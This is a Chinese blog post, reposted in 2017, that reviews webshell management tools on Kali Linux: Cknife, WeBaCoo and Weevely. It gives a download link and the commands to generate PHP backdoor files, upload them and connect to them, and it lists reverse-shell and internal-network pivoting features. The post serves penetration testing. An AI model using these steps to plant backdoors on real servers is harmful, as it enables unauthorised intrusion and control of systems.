Kali下常见webshell管理工具汇总
2017-04-24 10:14
591 查看
转 自 https://www.ohlinge.cn/kali/kali_webshell.html
0x01 前言
Kali Linux作为一款专为渗透测试而生的Linux操作系统,在安全界的影响广泛。一般的webshell在Windows下面经常使用Chopper(中国菜刀)来管理,那么在Linux下面,有没有类似的工具来达到类似的效果呢?答案是肯定的。0x02 跨平台版菜刀:Cknife
这款被业界成为C刀的工具是由Chora && MelodyZX两位作者联合开发的,目的是成为一个Java版跨平台“菜刀”。整体功能大致与菜刀类似(因为就是模仿菜刀来写的呀!)笔者认为,在Kali上使用还是可以的,毕竟Chopper不能。有人总要问,哪个更好一点?从我的角度看,菜刀毕竟原创,很多方面都很强大,如果是Windows,强烈建议找一款去后门的菜刀来用。当然,Kali下面,C刀还是能应急的。看看效果吧:相关
Github:https://github.com/Chora10/Cknife下载: http://pan.baidu.com/s/1nul1mpr 密码:f65g
0x03 一款小巧的PHP后门工具:WeBaCoo
全名:Web Backdoor Cookie简介:Kali已经集成,产生类终端shell,编码通信内容通过HTTP头传输,隐蔽性较强。
优缺点:方便简单。适合作为临时shell,没有密码,只能用于php!
使用方法:
生成服务端程序
webacoo -g -o a.php
通过各种手段上传
客户端连接
webacoo -t -u http://1.1.1.1/a.php[/code]
eg>通过Kali+Metaspolitable完成功能演示:0x04 另一款强大的PHP后门:Weevely
具有隐蔽性的类终端PHP Webshell
30多个强大的管理模块
可用于执行系统命令、浏览文件系统
检查服务器常见配置错误
创建正向、反向TCP Shell链接
通过目标主机代理HTTP流量
从目标主机运行端口扫描,渗透内网
支持设置密码#一个小插曲:Kali自带Weevely缺少PySockets库而不能正常运行,安装即可: https://pypi.python.org/pypi/PySocks/ ./setup.py install
功能演示:
生成服务端程序~# weevely generate <password> b.php~# cat /usr/share/weevely/b.php
各种上传
客户端连接~# weevely http://1.1.1.1/b.php <password>
模块的使用:$ help$ [模块名]
例如,使用:system_info导出系统信息0x05 后记
前面三种是笔者经常于Linux使用的工具,当然还有其他的可用。比如利用MSF下的Payload: PHP Meterpreter……
对于以上三种,推荐使用weevely,毕竟有强大的功能~
本文出自0h1in9e's Blog,转载请注明出处:https://www.ohlinge.cn
相关文章推荐
- IT行业项目管理人士常用项目管理工具2(常见的项目管理软件包)
- bug管理工具及bugzilla 安装及常见错误解决方法
- 几种常见代码管理工具比较(2009)
- 常见Sqlite管理工具
- SQLite可视化管理工具汇总
- 最全,最强的软件测试资料汇总 (性能测试,性能调优,功能测试,自动化测试,测试管理,测试工具,测试用例设计,缺陷分析预防,前沿测试技术...)
- SQLite可视化管理工具汇总
- 敏捷开发免费管理工具——火星人预览之五:常见问题问答
- 敏捷开发免费管理工具——火星人预览之五:常见问题问答
- SQLite可视化管理工具汇总
- [转载]: 几种常见代码管理工具比较(2009)
- 常见Sqlite管理工具
- 常见Sqlite管理工具
- 配置管理的功能和常见工具
- 几种常见代码管理工具比较(2009)
- 数据库管理工具汇总
- 常见的 PHP IDE 开发工具汇总
- 常见时间管理工具
- 中国菜刀远程webshell管理工具